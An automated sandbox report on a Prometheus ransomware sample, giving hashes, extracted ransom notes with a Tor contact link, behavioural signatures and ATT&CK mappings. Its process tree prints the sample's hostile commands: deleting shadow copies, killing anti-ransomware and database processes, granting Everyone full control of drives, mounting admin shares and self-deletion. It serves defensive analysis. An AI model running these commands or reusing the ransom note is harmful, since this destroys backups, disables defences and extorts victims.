Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
13-08-2024 05:39
General
-
Target
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
-
Size
290KB
-
MD5
a6dcf23059f6e61fa683907c47baf73e
-
SHA1
1d55396b26d97b18256513607dcbe3f308569d5b
-
SHA256
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
-
SHA512
72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7
-
SSDEEP
6144:a7QOomfMNffeRQHO1l+E9eWGktbD3xEKHb6Em:aVomfwfahxND3xEKHbH
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
Family
prometheus
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
--------------------------------------------------------------------------------
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
--------------------------------------------------------------------------------
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it's run.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
--------------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
!!!!!!!!!!!!!!!!!!!!!!!!!
--------------------------------------------------------------------------------
It doesn't matter to us what you choose.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install it.
3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser.
7. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier:
KvQGNEpYXs7pYI+Eu/95FmsXHPCzzuIQIunF3/BXQAXcDz+HBomGisx3+fbWMI7Kaa6qJgRgTOEmjOdsh04nLNMIuaLIzrOc/912cvprD2rzuIsTxGeJUW9d9ZfhIJHEt98YL86SyXnizs5DWrKXrRFzagv/VnewMBejIYiFvtvwJQITuJmhIn+ZEdw6gsIUGpiC7J3NAyYix/rNQ2HcOO6kk49ognIZ9mDFW2VTelFRnvohNdo9drH+b6E/QgPtWpEXarINlqIVBIih8jqhwusD4YKN1Kn8vQpTDX83ucK/oGS07HD8BMEBJ0yVJVPuN863c48wVWVsGvMzf2YvM8Fi1iGjq8p+OS3XsJuyI9nYuZUvjqhWsjMqJnLfroMqkhmBmsIzdVbvyWDt7TX2p+qzHnYFdAAeVFwdHXmGFOUpxcJ0dYzIiIXXbvuCUL5/aUbpI3baZiB9wXb4QybsGkcLGfHwh+wMgbAqRQsaBiVMMEw038oWiqnlb0nRXNMs8FcMZCpfX59Am+6kSrIq5rWh0oustCJ38FAPVvc/yUA3R6GfTZkqppRvKubHciDj3GVOPhL0lqePstf0k1qYYIwm22850GpGx6LXuVlTytAeoH8agidUSK7So73E7Imp9GVWuHd4F9j8/elZvICapco1wk6JhovRnn1IbWROnaw=
URLs
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Family
prometheus
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
It doesn't matter to us what you choose.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install it.
3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser.
7. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier: KvQGNEpYXs7pYI+Eu/95FmsXHPCzzuIQIunF3/BXQAXcDz+HBomGisx3+fbWMI7Kaa6qJgRgTOEmjOdsh04nLNMIuaLIzrOc/912cvprD2rzuIsTxGeJUW9d9ZfhIJHEt98YL86SyXnizs5DWrKXrRFzagv/VnewMBejIYiFvtvwJQITuJmhIn+ZEdw6gsIUGpiC7J3NAyYix/rNQ2HcOO6kk49ognIZ9mDFW2VTelFRnvohNdo9drH+b6E/QgPtWpEXarINlqIVBIih8jqhwusD4YKN1Kn8vQpTDX83ucK/oGS07HD8BMEBJ0yVJVPuN863c48wVWVsGvMzf2YvM8Fi1iGjq8p+OS3XsJuyI9nYuZUvjqhWsjMqJnLfroMqkhmBmsIzdVbvyWDt7TX2p+qzHnYFdAAeVFwdHXmGFOUpxcJ0dYzIiIXXbvuCUL5/aUbpI3baZiB9wXb4QybsGkcLGfHwh+wMgbAqRQsaBiVMMEw038oWiqnlb0nRXNMs8FcMZCpfX59Am+6kSrIq5rWh0oustCJ38FAPVvc/yUA3R6GfTZkqppRvKubHciDj3GVOPhL0lqePstf0k1qYYIwm22850GpGx6LXuVlTytAeoH8agidUSK7So73E7Imp9GVWuHd4F9j8/elZvICapco1wk6JhovRnn1IbWROnaw=
URLs
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Signatures
-
Disables service(s) 3 TTPs
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Renames multiple (200) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Kills process with taskkill 48 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\Users2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\A$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\B$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\C$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\D$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\E$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\F$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\G$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\J$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\H$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\K$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\I$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\L$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\M$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\P$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\N$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\Q$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\O$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\R$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\S$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\V$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\T$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\W$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\U$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\X$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\Y$2⤵
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.248\Z$2⤵
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
- Network Service Discovery
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe2⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD59835ab4562d5cc431b31a78243b1f47d
SHA19055032bc4f4c4a738bb62315658cfeee03c5eb9
SHA2568b5efd63f358557df9bead4c4bcd4d339635672643ef906c800c0ed95bb26c87
SHA51208eeba9162f3ec2364f5a32b31f9b88570e6206ad33447e4052f6ae9961f21dd29eb17992e87c32b57201fca288f6918365d036fa75042aa99d00552892bcb52
-
Filesize
2KB
MD5aa2497f2df199d1d59dfe494f48d6029
SHA1f07bbe471a7ba4acc1c68eab7c450097ff15238b
SHA256ac73bc483327d5e982792b0d6776b8cdd32cb7b6be61d19c4d8c7c4e0e9f52c7
SHA5123d9f15387e03374ce3607de9489d90917f0622f7228ca905b587f4440a31457fa4beba43d72313a4704c3cfa88b7731820b7e351c6841db572a80a1d8926a29e
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
4KB
-
Filesize
312KB
-
Filesize
9.9MB
-
Filesize
4KB
-
Filesize
9.9MB
-
Filesize
9.9MB